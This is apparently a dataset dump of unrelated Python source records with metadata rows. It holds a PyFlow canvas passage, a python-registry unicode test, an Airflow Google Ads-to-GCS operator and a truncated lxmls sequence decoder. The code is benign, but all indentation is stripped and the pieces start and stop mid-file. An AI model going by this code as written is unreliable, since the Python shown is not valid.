if not wire.isSelected() and QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
wire.setSelected(True)
elif wire.isSelected() and not QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
if wire not in self._mouseDownConnectionsSelection:
wire.setSelected(False)
elif modifiers == QtCore.Qt.ControlModifier | QtCore.Qt.ShiftModifier:
for node in nodes:
if self._selectionRect.collidesWithItem(node):
node.setSelected(False)
for wire in self.connections.values():
if QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
wire.setSelected(False)
else:
self.clearSelection()
for node in nodes:
# if node not in [self.inputsItem,self.outputsItem]:
if not node.isSelected() and self._selectionRect.collidesWithItem(node):
node.setSelected(True)
elif node.isSelected() and not self._selectionRect.collidesWithItem(node):
node.setSelected(False)
for wire in self.connections.values():
if not wire.isSelected() and QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
wire.setSelected(True)
elif wire.isSelected() and not QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
wire.setSelected(False)
elif self.manipulationMode == CanvasManipulationMode.MOVE:
if self.pressed_item.objectName() == "MouseLocked":
super(Canvas, self).mouseMoveEvent(event)
else:
newPos = self.mapToScene(event.pos())
scaledDelta = mouseDelta / self.currentViewScale()
selectedNodes = self.selectedNodes()
# Apply the delta to each selected node
for node in selectedNodes:
node.translate(scaledDelta.x(), scaledDelta.y())
if (isinstance(node, UIRerouteNode) or isinstance(node, UIRerouteNodeSmall)) and modifiers == QtCore.Qt.AltModifier:
mouseRect = QtCore.QRect(QtCore.QPoint(event.pos().x() - 1, event.pos().y() - 1),
QtCore.QPoint(event.pos().x() + 1, event.pos().y() + 1))
hoverItems = self.items(mouseRect)
newOuts = []
newIns = []
for item in hoverItems:
if isinstance(item, UIConnection):
if list(node.UIinputs.values())[0].connections and list(node.UIoutputs.values())[0].connections:
if item.source() == list(node.UIinputs.values())[0].connections[0].source():
newOuts.append([item.destination(), item.drawDestination])
if item.destination() == list(node.UIoutputs.values())[0].connections[0].destination():
newIns.append([item.source(), item.drawSource])
for out in newOuts:
self.connectPins(list(node.UIoutputs.values())[0], out[0])
for inp in newIns:
self.connectPins(inp[0], list(node.UIinputs.values())[0])
elif self.manipulationMode == CanvasManipulationMode.PAN:
self.pan(mouseDelta)
elif self.manipulationMode == CanvasManipulationMode.ZOOM:
zoomFactor = 1.0
if mouseDelta.x() > 0:
zoomFactor = 1.0 + mouseDelta.x() / 100.0
else:
zoomFactor = 1.0 / (1.0 + abs(mouseDelta.x()) / 100.0)
self.zoom(zoomFactor)
elif self.manipulationMode == CanvasManipulationMode.COPY:
delta = self.mousePos - self.mousePressPose
if delta.manhattanLength() > 15:
self.manipulationMode = CanvasManipulationMode.MOVE
selectedNodes = self.selectedNodes()
copiedNodes = self.copyNodes(toClipBoard=False)
self.pasteNodes(move=False, data=copiedNodes)
scaledDelta = delta / self.currentViewScale()
for node in self.selectedNodes():
node.translate(scaledDelta.x(), scaledDelta.y())
EditorHistory().saveState("Drag copy nodes", modify=True)
else:
super(Canvas, self).mouseMoveEvent(event)
self.autoPanController.Tick(self.viewport().rect(), event.pos())
self._lastMousePos = event.pos()
def findPinNearPosition(self, scenePos, tolerance=3):
tolerance = tolerance * self.currentViewScale()
rect = QtCore.QRect(QtCore.QPoint(scenePos.x() - tolerance, scenePos.y() - tolerance),
QtCore.QPoint(scenePos.x() + tolerance, scenePos.y() + tolerance))
items = self.items(rect)
pins = [i for i in items if isinstance(i, UIPinBase) and type(i) is not PinGroup]
if len(pins) > 0:
return pins[0]
return None
def mouseReleaseEvent(self, event):
super(Canvas, self).mouseReleaseEvent(event)
modifiers = event.modifiers()
self.autoPanController.stop()
self.mouseReleasePos = event.pos()
self.released_item = self.itemAt(event.pos())
self.releasedPin = self.findPinNearPosition(event.pos())
self._resize_group_mode = False
self.viewport().setCursor(QtCore.Qt.ArrowCursor)
if self.manipulationMode == CanvasManipulationMode.MOVE and len(self.selectedNodes()) > 0:
EditorHistory().saveState("Move nodes", modify=True)
if len(self.reconnectingWires) > 0:
if self.releasedPin is not None:
for wire in self.reconnectingWires:
if wire.destinationPositionOverride is not None:
lhsPin = wire.source()
self.removeConnection(wire)
self.connectPinsInternal(lhsPin, self.releasedPin)
EditorHistory().saveState("Reconnect pins", modify=True)
elif wire.sourcePositionOverride is not None:
rhsPin = wire.destination()
self.removeConnection(wire)
self.connectPinsInternal(self.releasedPin, rhsPin)
EditorHistory().saveState("Reconnect pins", modify=True)
else:
for wire in self.reconnectingWires:
self.removeConnection(wire)
EditorHistory().saveState("Tear off connection", modify=True)
for wire in self.reconnectingWires:
wire.sourcePositionOverride = None
wire.destinationPositionOverride = None
self.reconnectingWires.clear()
for n in self.getAllNodes():
if not n.isCommentNode:
n.setFlag(QGraphicsItem.ItemIsMovable)
n.setFlag(QGraphicsItem.ItemIsSelectable)
if self._drawRealtimeLine:
self._drawRealtimeLine = False
if self.realTimeLine in self.scene().items():
self.removeItemByName('RealTimeLine')
if self.manipulationMode == CanvasManipulationMode.SELECT:
self._selectionRect.destroy()
self._selectionRect = None
if event.button() == QtCore.Qt.RightButton and modifiers == QtCore.Qt.NoModifier:
# show nodebox only if drag is small and no items under cursor
if self.pressed_item is None or (isinstance(self.pressed_item, UINodeBase) and self.nodeFromInstance(self.pressed_item).isCommentNode):
if modifiers == QtCore.Qt.NoModifier:
dragDiff = self.mapToScene(self.mousePressPose) - self.mapToScene(event.pos())
if all([abs(i) < 0.4 for i in [dragDiff.x(), dragDiff.y()]]):
self.showNodeBox()
elif event.button() == QtCore.Qt.RightButton and modifiers == QtCore.Qt.ControlModifier:
self.menu.exec_(QtGui.QCursor.pos())
elif event.button() == QtCore.Qt.LeftButton and self.releasedPin is None:
if isinstance(self.pressed_item, UIPinBase) and not self.resizing and modifiers == QtCore.Qt.NoModifier:
if not type(self.pressed_item) is PinGroup:
# suggest nodes that can be connected to pressed pin
self.showNodeBox(self.pressed_item.direction, self.pressed_item._rawPin.getCurrentStructure())
self.manipulationMode = CanvasManipulationMode.NONE
if not self.resizing:
p_itm = self.pressedPin
r_itm = self.releasedPin
do_connect = True
for i in [p_itm, r_itm]:
if not i:
do_connect = False
break
if not isinstance(i, UIPinBase):
do_connect = False
break
if p_itm and r_itm:
if p_itm.__class__.__name__ == UIPinBase.__name__ and r_itm.__class__.__name__ == UIPinBase.__name__:
if cycleCheck(p_itm, r_itm):
# print('cycles are not allowed')
do_connect = False
if do_connect:
if p_itm is not r_itm:
self.connectPins(p_itm, r_itm)
# We don't want properties view go crazy
# check if same node pressed and released left mouse button and not moved
releasedNode = self.nodeFromInstance(self.released_item)
pressedNode = self.nodeFromInstance(self.pressed_item)
manhattanLengthTest = (self.mousePressPose - event.pos()).manhattanLength() <= 2
if all([event.button() == QtCore.Qt.LeftButton, releasedNode is not None,
pressedNode is not None, pressedNode == releasedNode, manhattanLengthTest]):
# check if clicking on node action button
if self.released_item is not None:
if isinstance(self.released_item.parentItem(), NodeActionButtonBase):
return
self.tryFillPropertiesView(pressedNode)
elif event.button() == QtCore.Qt.LeftButton:
self.requestClearProperties.emit()
self.resizing = False
self.updateRerutes(event, False)
self.validateCommentNodesOwnership(self.graphManager.activeGraph(), False)
def removeItemByName(self, name):
[self.scene().removeItem(i) for i in self.scene().items() if hasattr(i, 'name') and i.name == name]
def tryFillPropertiesView(self, obj):
if isinstance(obj, IPropertiesViewSupport):
self.requestFillProperties.emit(obj.createPropertiesWidget)
def wheelEvent(self, event):
(xfo, invRes) = self.transform().inverted()
topLeft = xfo.map(self.rect().topLeft())
bottomRight = xfo.map(self.rect().bottomRight())
center = (topLeft + bottomRight) * 0.5
zoomFactor = 1.0 + event.delta() * self._mouseWheelZoomRate
self.zoom(zoomFactor)
def stepToCompound(self, compoundNodeName):
self.graphManager.selectGraphByName(compoundNodeName)
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
urls = event.mimeData().urls()
if len(urls) == 1:
url = urls[0]
if url.isLocalFile():
filePath = url.toLocalFile()
if filePath.endswith(".pygraph"):
with open(filePath, 'r') as f:
data = json.load(f)
if "fileVersion" in data:
event.accept()
self.dropCallback = partial(self.getApp().loadFromFileChecked, filePath)
return
elif filePath.endswith(".compound"):
with open(filePath, 'r') as f:
data = json.load(f)
def spawnCompoundFromData(data):
mousePos = self.mapToScene(self.mousePos)
compound = self.spawnNode("compound", mousePos.x(), mousePos.y())
compound.assignData(data)
event.accept()
self.dropCallback = partial(spawnCompoundFromData, data)
return
elif filePath.endswith(".pynode"):
with open(filePath, 'r') as f:
data = f.read()
def spawnPyNodeFromData(data):
mousePos = self.mapToScene(self.mousePos)
compound = self.spawnNode("pythonNode", mousePos.x(), mousePos.y())
compound.tryApplyNodeData(data)
event.accept()
self.dropCallback = partial(spawnPyNodeFromData, data)
return
super(Canvas, self).dragEnterEvent(event)
def dragMoveEvent(self, event):
self.mousePos = event.pos()
if self.dropCallback is not None:
event.accept()
else:
super(Canvas, self).dragMoveEvent(event)
def dragLeaveEvent(self, event):
self.dropCallback = None
def dropEvent(self, event):
if self.dropCallback is not None:
self.dropCallback()
super(Canvas, self).dropEvent(event)
def drawBackground(self, painter, rect):
super(Canvas, self).drawBackground(painter, rect)
lod = self.getLodValueFromCurrentScale(3)
self.boundingRect = rect
polygon = self.mapToScene(self.viewport().rect())
painter.fillRect(rect, QtGui.QBrush(editableStyleSheet().CanvasBgColor))
left = int(rect.left()) - (int(rect.left()) % editableStyleSheet().GridSizeFine[0])
top = int(rect.top()) - (int(rect.top()) % editableStyleSheet().GridSizeFine[0])
if lod < 3:
# Draw horizontal fine lines
gridLines = []
y = float(top)
while y < float(rect.bottom()):
gridLines.append(QtCore.QLineF(rect.left(), y, rect.right(), y))
y += editableStyleSheet().GridSizeFine[0]
painter.setPen(QtGui.QPen(editableStyleSheet().CanvasGridColor, 1))
painter.drawLines(gridLines)
# Draw vertical fine lines
gridLines = []
x = float(left)
while x < float(rect.right()):
gridLines.append(QtCore.QLineF(x, rect.top(), x, rect.bottom()))
x += editableStyleSheet().GridSizeFine[0]
painter.setPen(QtGui.QPen(editableStyleSheet().CanvasGridColor, 1))
painter.drawLines(gridLines)
# Draw thick grid
left = int(rect.left()) - (int(rect.left()) % editableStyleSheet().GridSizeHuge[0])
top = int(rect.top()) - (int(rect.top()) % editableStyleSheet().GridSizeHuge[0])
# Draw vertical thick lines
gridLines = []
painter.setPen(QtGui.QPen(editableStyleSheet().CanvasGridColorDarker, 1.5))
x = left
while x < rect.right():
gridLines.append(QtCore.QLineF(x, rect.top(), x, rect.bottom()))
x += editableStyleSheet().GridSizeHuge[0]
painter.drawLines(gridLines)
# Draw horizontal thick lines
gridLines = []
painter.setPen(QtGui.QPen(editableStyleSheet().CanvasGridColorDarker, 1.5))
y = top
while y < rect.bottom():
gridLines.append(QtCore.QLineF(rect.left(), y, rect.right(), y))
y += editableStyleSheet().GridSizeHuge[0]
painter.drawLines(gridLines)
if editableStyleSheet().DrawNumbers[0] >= 1:
# draw numbers
scale = self.currentViewScale()
f = painter.font()
f.setPointSize(6 / min(scale, 1))
f.setFamily("Consolas")
painter.setFont(f)
y = float(top)
while y < float(rect.bottom()):
y += editableStyleSheet().GridSizeFine[0]
if abs(y) % 100 == 0 and y > rect.top() + 30:
painter.setPen(QtGui.QPen(editableStyleSheet().CanvasGridColorDarker.lighter(300)))
painter.drawText(rect.left(), y - 1.0, str(y))
x = float(left)
while x < rect.right():
x += editableStyleSheet().GridSizeHuge[0]
if abs(x) % 100 == 0 and x > rect.left() + 30:
painter.setPen(QtGui.QPen(editableStyleSheet().CanvasGridColorDarker.lighter(300)))
painter.drawText(x, rect.top() + painter.font().pointSize(), str(x))
def _createNode(self, jsonTemplate):
# Check if this node is variable get/set. Variables created in child graphs are not visible to parent ones
# Stop any attempt to disrupt variable scope. Even if we accidentally forgot this check, GraphBase.addNode will fail
if jsonTemplate['type'] in ['getVar', 'setVar']:
var = self.graphManager.findVariableByUid(uuid.UUID(jsonTemplate['varUid']))
variableLocation = var.location()
graphLocation = self.graphManager.location()
if len(variableLocation) > len(graphLocation):
return None
if len(variableLocation) == len(graphLocation):
if Counter(variableLocation) != Counter(graphLocation):
return None
nodeInstance = getNodeInstance(jsonTemplate, self)
assert(nodeInstance is not None), "Node instance is not found!"
nodeInstance.setPos(jsonTemplate["x"], jsonTemplate["y"])
# set pins data
for inpJson in jsonTemplate['inputs']:
pin = nodeInstance.getPinSG(inpJson['name'], PinSelectionGroup.Inputs)
if pin:
pin.uid = uuid.UUID(inpJson['uuid'])
try:
pin.setData(json.loads(inpJson['value'], cls=pin.jsonDecoderClass()))
except:
pin.setData(pin.defaultValue())
if inpJson['bDirty']:
pin.setDirty()
else:
pin.setClean()
for outJson in jsonTemplate['outputs']:
pin = nodeInstance.getPinSG(outJson['name'], PinSelectionGroup.Outputs)
if pin:
pin.uid = uuid.UUID(outJson['uuid'])
try:
pin.setData(json.loads(outJson['value'], cls=pin.jsonDecoderClass()))
except:
pin.setData(pin.defaultValue())
if outJson['bDirty']:
pin.setDirty()
else:
pin.setClean()
return nodeInstance
def createNode(self, jsonTemplate, **kwargs):
nodeInstance = self._createNode(jsonTemplate)
EditorHistory().saveState("Create node {}".format(nodeInstance.name), modify=True)
return nodeInstance
def spawnNode(self, nodeClass, x, y):
packageName = None
for pkgName, pkg in GET_PACKAGES().items():
if nodeClass in pkg.GetNodeClasses():
packageName = pkgName
break
if packageName is not None:
jsonTemplate = NodeBase.jsonTemplate()
jsonTemplate["type"] = nodeClass
jsonTemplate["name"] = nodeClass
jsonTemplate["package"] = packageName
jsonTemplate["uuid"] = str(uuid.uuid4())
jsonTemplate["x"] = x
jsonTemplate["y"] = y
return self.createNode(jsonTemplate)
def createWrappersForGraph(self, rawGraph):
# when raw graph was created, we need to create all ui wrappers for it
uiNodesJsonData = {}
for node in rawGraph.getNodesList():
if node.getWrapper() is not None:
continue
uiNode = getUINodeInstance(node)
uiNodeJsonTemplate = node.serialize()
uiNodeJsonTemplate["wrapper"] = node.wrapperJsonData
self.addNode(uiNode, uiNodeJsonTemplate, parentGraph=rawGraph)
uiNode.updateNodeShape()
uiNodesJsonData[uiNode] = uiNodeJsonTemplate
# restore ui connections
for rawNode in rawGraph.getNodesList():
uiNode = rawNode.getWrapper()
for outUiPin in uiNode.UIoutputs.values():
for inputRawPin in getConnectedPins(outUiPin._rawPin):
inUiPin = inputRawPin.getWrapper()()
self.createUIConnectionForConnectedPins(outUiPin, inUiPin)
for uiNode, data in uiNodesJsonData.items():
if uiNode.isUnderActiveGraph():
uiNode.show()
if uiNode.isCommentNode:
uiNode.collapsed = False
for uiNode, data in uiNodesJsonData.items():
if uiNode.isUnderActiveGraph():
if not uiNode.isCommentNode:
uiNode.updateOwningCommentNode()
# comments should update collapsing info after everything was created
for uiNode, data in uiNodesJsonData.items():
if uiNode.isCommentNode:
uiNode.collapsed = data["wrapper"]["collapsed"]
self.validateCommentNodesOwnership(rawGraph)
self.validateConnections(rawGraph)
def addNode(self, uiNode, jsonTemplate, parentGraph=None):
"""Adds node to a graph
:param uiNode: Raw node wrapper
:type uiNode: :class:`~PyFlow.UI.Canvas.UINodeBase.UINodeBase`
"""
uiNode.canvasRef = weakref.ref(self)
self.scene().addItem(uiNode)
assert(jsonTemplate is not None)
if uiNode._rawNode.graph is None:
# if added from node box
self.graphManager.activeGraph().addNode(uiNode._rawNode, jsonTemplate)
else:
# When copy paste compound node. we are actually pasting a tree of graphs
# So we need to put each node under correct graph
assert(parentGraph is not None), "Parent graph is invalid"
parentGraph.addNode(uiNode._rawNode, jsonTemplate)
uiNode.postCreate(jsonTemplate)
def createUIConnectionForConnectedPins(self, srcUiPin, dstUiPin):
assert(srcUiPin is not None)
assert(dstUiPin is not None)
if srcUiPin.direction == PinDirection.Input:
srcUiPin, dstUiPin = dstUiPin, srcUiPin
uiConnection = UIConnection(srcUiPin, dstUiPin, self)
self.scene().addItem(uiConnection)
self.connections[uiConnection.uid] = uiConnection
return uiConnection
def connectPinsInternal(self, src, dst):
result = connectPins(src._rawPin, dst._rawPin)
if result:
return self.createUIConnectionForConnectedPins(src, dst)
return None
def connectPins(self, src, dst):
# Highest level connect pins function
if src and dst:
if canConnectPins(src._rawPin, dst._rawPin):
wire = self.connectPinsInternal(src, dst)
if wire is not None:
EditorHistory().saveState("Connect pins", modify=True)
def removeEdgeCmd(self, connections):
for wire in list(connections):
self.removeConnection(wire)
def removeConnection(self, connection):
src = connection.source()._rawPin
dst = connection.destination()._rawPin
# this will remove raw pins from affection lists
# will call pinDisconnected for raw pins
disconnectPins(src, dst)
# call disconnection events for ui pins
connection.source().pinDisconnected(connection.destination())
connection.destination().pinDisconnected(connection.source())
self.connections.pop(connection.uid)
connection.source().uiConnectionList.remove(connection)
connection.destination().uiConnectionList.remove(connection)
connection.prepareGeometryChange()
self.scene().removeItem(connection)
def zoomDelta(self, direction):
if direction:
self.zoom(1 + 0.1)
else:
self.zoom(1 - 0.1)
def reset_scale(self):
self.resetMatrix()
def viewMinimumScale(self):
return self._minimum_scale
def viewMaximumScale(self):
return self._maximum_scale
def currentViewScale(self):
return self.transform().m22()
def getLodValueFromScale(self, numLods=5, scale=1.0):
lod = lerp(numLods, 1, GetRangePct(self.viewMinimumScale(), self.viewMaximumScale(), scale))
return int(round(lod))
def getLodValueFromCurrentScale(self, numLods=5):
return self.getLodValueFromScale(numLods, self.currentViewScale())
def zoom(self, scale_factor):
self.factor = self.transform().m22()
futureScale = self.factor * scale_factor
if futureScale <= self._minimum_scale:
scale_factor = (self._minimum_scale) / self.factor
if futureScale >= self._maximum_scale:
scale_factor = (self._maximum_scale - 0.1) / self.factor
self.scale(scale_factor, scale_factor)
def eventFilter(self, object, event):
if event.type() == QtCore.QEvent.KeyPress and event.key() == QtCore.Qt.Key_Tab:
self.showNodeBox()
return False
class CanvasWidget(QWidget):
"""docstring for CanvasWidget."""
def __init__(self, graphManager, pyFlowInstance, parent=None):
super(CanvasWidget, self).__init__(parent)
self.manager = graphManager
self.pyFlowInstance = pyFlowInstance
self.mainLayout = QVBoxLayout(self)
self.mainLayout.setSpacing(1)
self.mainLayout.setContentsMargins(1, 1, 1, 1)
self.setContentsMargins(1, 1, 1, 1)
self.mainLayout.setObjectName("canvasWidgetMainLayout")
self.pathLayout = QHBoxLayout()
self.mainLayout.addLayout(self.pathLayout)
self.compoundPropertiesWidget = QWidget()
self.compoundPropertiesWidget.setContentsMargins(1, 1, 1, 1)
self.compoundPropertiesWidget.setObjectName("compoundPropertiesWidget")
self.compoundPropertiesLayout = QHBoxLayout(self.compoundPropertiesWidget)
self.compoundPropertiesLayout.setSpacing(1)
self.compoundPropertiesLayout.setContentsMargins(1, 1, 1, 1)
self.mainLayout.addWidget(self.compoundPropertiesWidget)
self.leCompoundName = QLineEdit()
self.leCompoundName.setObjectName("leCompoundName")
self.leCompoundCategory = QLineEdit()
self.leCompoundCategory.setObjectName("leCompoundCategory")
compoundNameLabel = QLabel("Name:")
compoundNameLabel.setObjectName("compoundNameLabel")
self.compoundPropertiesLayout.addWidget(compoundNameLabel)
self.compoundPropertiesLayout.addWidget(self.leCompoundName)
compoundCategoryLabel = QLabel("Category:")
compoundCategoryLabel.setObjectName("compoundCategoryLabel")
self.compoundPropertiesLayout.addWidget(compoundCategoryLabel)
self.compoundPropertiesLayout.addWidget(self.leCompoundCategory)
self.canvas = Canvas(graphManager, pyFlowInstance)
self.mainLayout.addWidget(self.canvas)
self.manager.graphChanged.connect(self.updateGraphTreeLocation)
self.canvas.requestFillProperties.connect(self.pyFlowInstance.onRequestFillProperties)
self.canvas.requestClearProperties.connect(self.pyFlowInstance.onRequestClearProperties)
rxLettersAndNumbers = QtCore.QRegExp('^[a-zA-Z0-9]*$')
nameValidator = QtGui.QRegExpValidator(rxLettersAndNumbers, self.leCompoundName)
self.leCompoundName.setValidator(nameValidator)
self.leCompoundName.returnPressed.connect(self.onActiveCompoundNameAccepted)
rxLetters = QtCore.QRegExp('^[a-zA-Z]*$')
categoryValidator = QtGui.QRegExpValidator(rxLetters, self.leCompoundCategory)
self.leCompoundCategory.setValidator(categoryValidator)
self.leCompoundCategory.returnPressed.connect(self.onActiveCompoundCategoryAccepted)
self.updateGraphTreeLocation()
self.pyFlowInstance.fileBeenLoaded.connect(self.onFileBeenLoaded)
def shoutDown(self):
self.canvas.shoutDown()
def Tick(self, delta):
self.canvas.Tick(delta)
def onFileBeenLoaded(self):
for graph in self.manager.getAllGraphs():
self.canvas.createWrappersForGraph(graph)
def updateGraphTreeLocation(self, *args, **kwargs):
location = self.canvas.location()
clearLayout(self.pathLayout)
spacerItem = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.pathLayout.addItem(spacerItem)
for folderName in location:
index = self.pathLayout.count() - 1
btn = QPushButton(folderName)
def onClicked(checked, name=None):
self.canvas.stepToCompound(name)
btn.clicked.connect(lambda chk=False, name=folderName: onClicked(chk, name))
self.pathLayout.insertWidget(index, btn)
self.setCompoundPropertiesWidgetVisible(self.manager.activeGraph().depth() > 1)
def setCompoundPropertiesWidgetVisible(self, bVisible):
if bVisible:
self.compoundPropertiesWidget.show()
self.leCompoundName.setText(self.manager.activeGraph().name)
self.leCompoundCategory.setText(self.manager.activeGraph().category)
else:
self.compoundPropertiesWidget.hide()
def onActiveCompoundNameAccepted(self):
newName = self.manager.getUniqName(self.leCompoundName.text())
self.manager.activeGraph().name = newName
self.leCompoundName.blockSignals(True)
self.leCompoundName.setText(newName)
self.leCompoundName.blockSignals(False)
self.updateGraphTreeLocation()
def onActiveCompoundCategoryAccepted(self):
newCategoryName = self.leCompoundCategory.text()
self.manager.activeGraph().category = newCategoryName
| 45.230233 | 205 | 0.588339 |
acdfb3415973571117ca27d67786cdb3be05b1f1 | 1,207 | py | Python | tests/test_unicode_names.py | timgates42/python-registry | c028c7fca99aaed835490ada8d43dfea42811d3c | [
"Apache-2.0"
] | 326 | 2015-01-10T20:48:33.000Z | 2022-03-14T07:59:58.000Z | tests/test_unicode_names.py | timgates42/python-registry | c028c7fca99aaed835490ada8d43dfea42811d3c | [
"Apache-2.0"
] | 70 | 2015-01-02T19:29:31.000Z | 2021-06-17T16:32:03.000Z | tests/test_unicode_names.py | timgates42/python-registry | c028c7fca99aaed835490ada8d43dfea42811d3c | [
"Apache-2.0"
] | 108 | 2015-01-07T18:20:45.000Z | 2022-03-05T15:26:06.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import six
import unittest
from Registry import Registry
class TestRegistryUnicode(unittest.TestCase):
def setUp(self):
self.path = os.path.join(os.path.dirname(__file__), 'reg_samples', 'UNICODE_TESTS')
@classmethod
def is_correct_string(cls, data):
return (isinstance(data, six.text_type)
and (data == u""
or data.startswith(u"ASCII")
or data.startswith(u'UNICODE_JUMBLE_{H~\u2591\xf4\xab}')))
def test_decoding(self):
root = Registry.Registry(self.path).root()
for key in root.subkeys():
self.assertTrue(self.is_correct_string(key.name()), key.name())
for value in key.values():
self.assertTrue(self.is_correct_string(value.name()), value.name())
val = value.value()
if isinstance(val, list):
for item in val:
self.assertTrue(self.is_correct_string(item), item)
else:
self.assertTrue(self.is_correct_string(val), val)
# Run Tests
if __name__ == '__main__':
unittest.main(verbosity=2)
| 32.621622 | 91 | 0.588235 |
acdfb3b1ac38f0da9e4b8186c49e13aaad56ab69 | 4,776 | py | Python | airflow/providers/google/ads/operators/ads.py | emilioego/airflow | 3457c7847cd24413ff5b622e65c27d8370f94502 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 79 | 2021-10-15T07:32:27.000Z | 2022-03-28T04:10:19.000Z | airflow/providers/google/ads/operators/ads.py | emilioego/airflow | 3457c7847cd24413ff5b622e65c27d8370f94502 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 153 | 2021-10-15T05:23:46.000Z | 2022-02-23T06:07:10.000Z | airflow/providers/google/ads/operators/ads.py | emilioego/airflow | 3457c7847cd24413ff5b622e65c27d8370f94502 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 23 | 2021-10-15T02:36:37.000Z | 2022-03-17T02:59:27.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains Google Ad to GCS operators."""
import csv
from tempfile import NamedTemporaryFile
from typing import Optional, Sequence, Union
from airflow.models import BaseOperator
from airflow.providers.google.ads.hooks.ads import GoogleAdsHook
from airflow.providers.google.cloud.hooks.gcs import GCSHook
from airflow.utils.decorators import apply_defaults
class GoogleAdsListAccountsOperator(BaseOperator):
"""
Saves list of customers on GCS in form of a csv file.
The resulting list of customers is based on your OAuth credentials. The request returns a list
of all accounts that you are able to act upon directly given your current credentials. This will
not necessarily include all accounts within the account hierarchy; rather, it will only include
accounts where your authenticated user has been added with admin or other rights in the account.
..seealso::
https://developers.google.com/google-ads/api/reference/rpc
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:GoogleAdsListAccountsOperator`
:param bucket: The GCS bucket to upload to
:type bucket: str
:param object_name: GCS path to save the csv file. Must be the full file path (ex. `path/to/file.csv`)
:type object_name: str
:param gcp_conn_id: Airflow Google Cloud connection ID
:type gcp_conn_id: str
:param google_ads_conn_id: Airflow Google Ads connection ID
:type google_ads_conn_id: str
:param page_size: The number of results per API page request. Max 10,000
:type page_size: int
:param gzip: Option to compress local file or file data for upload
:type gzip: bool
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = (
"bucket",
"object_name",
"impersonation_chain",
)
@apply_defaults
def __init__(
self,
*,
bucket: str,
object_name: str,
gcp_conn_id: str = "google_cloud_default",
google_ads_conn_id: str = "google_ads_default",
gzip: bool = False,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.bucket = bucket
self.object_name = object_name
self.gcp_conn_id = gcp_conn_id
self.google_ads_conn_id = google_ads_conn_id
self.gzip = gzip
self.impersonation_chain = impersonation_chain
def execute(self, context: dict) -> str:
uri = f"gs://{self.bucket}/{self.object_name}"
ads_hook = GoogleAdsHook(gcp_conn_id=self.gcp_conn_id, google_ads_conn_id=self.google_ads_conn_id)
gcs_hook = GCSHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
with NamedTemporaryFile("w+") as temp_file:
# Download accounts
accounts = ads_hook.list_accessible_customers()
writer = csv.writer(temp_file)
writer.writerows(accounts)
temp_file.flush()
# Upload to GCS
gcs_hook.upload(
bucket_name=self.bucket, object_name=self.object_name, gzip=self.gzip, filename=temp_file.name
)
self.log.info("Uploaded %s to %s", len(accounts), uri)
return uri
| 41.530435 | 110 | 0.707915 |
acdfb449f18c8ee07441701e9ae2c3dfab704f22 | 4,850 | py | Python | lxmls/sequences/sequence_classification_decoder.py | gomesfernanda/lxmls_lab | 74b60b9e79aaa2994aee9428b623c04e93807bda | [
"MIT"
] | 1 | 2018-06-20T12:41:19.000Z | 2018-06-20T12:41:19.000Z | lxmls/sequences/sequence_classification_decoder.py | gomesfernanda/lxmls_lab | 74b60b9e79aaa2994aee9428b623c04e93807bda | [
"MIT"
] | null | null | null | lxmls/sequences/sequence_classification_decoder.py | gomesfernanda/lxmls_lab | 74b60b9e79aaa2994aee9428b623c04e93807bda | [
"MIT"
] | null | null | null | import numpy as np
from lxmls.sequences.log_domain import *
import pdb
class SequenceClassificationDecoder:
""" Implements a sequence classification decoder."""
def __init__(self):
pass
# ----------
# Computes the forward trellis for a given sequence.
# Receives:
#
# Initial scores: (num_states) array
# Transition scores: (length-1, num_states, num_states) array
# Final scores: (num_states) array
# Emission scoress: (length, num_states) array
# ----------
def run_forward(self, initial_scores, transition_scores, final_scores, emission_scores):
length = np.size(emission_scores, 0) # Length of the sequence.
num_states = np.size(initial_scores) # Number of states.
# Forward variables.
forward = np.zeros([length, num_states]) + logzero()
# Initialization.
forward[0, :] = emission_scores[0, :] + initial_scores
# Forward loop.
for pos in range(1, length):
for current_state in range(num_states):
# Note the fact that multiplication in log domain turns a sum and sum turns a logsum
forward[pos, current_state] = logsum(forward[pos-1, :] + transition_scores[pos-1, current_state, :])
forward[pos, current_state] += emission_scores[pos, current_state]
# Termination.
log_likelihood = logsum(forward[length-1, :] + final_scores)
return log_likelihood, forward
# ----------
# Computes the backward trellis for a given sequence.
# Receives:
#
# Initial scores: (num_states) array
# Transition scores: (length-1, num_states, num_states) array
# Final scores: (num_states) array
# Emission scoress: (length, num_states) array
# ----------
def run_backward(self, initial_scores, transition_scores, final_scores, emission_scores):
length = np.size(emission_scores, 0) # Length of the sequence.
num_states = np.size(initial_scores) # Number of states.
# Backward variables.
backward = np.zeros([length, num_states]) + logzero()
# Initialization.
backward[length-1, :] = final_scores
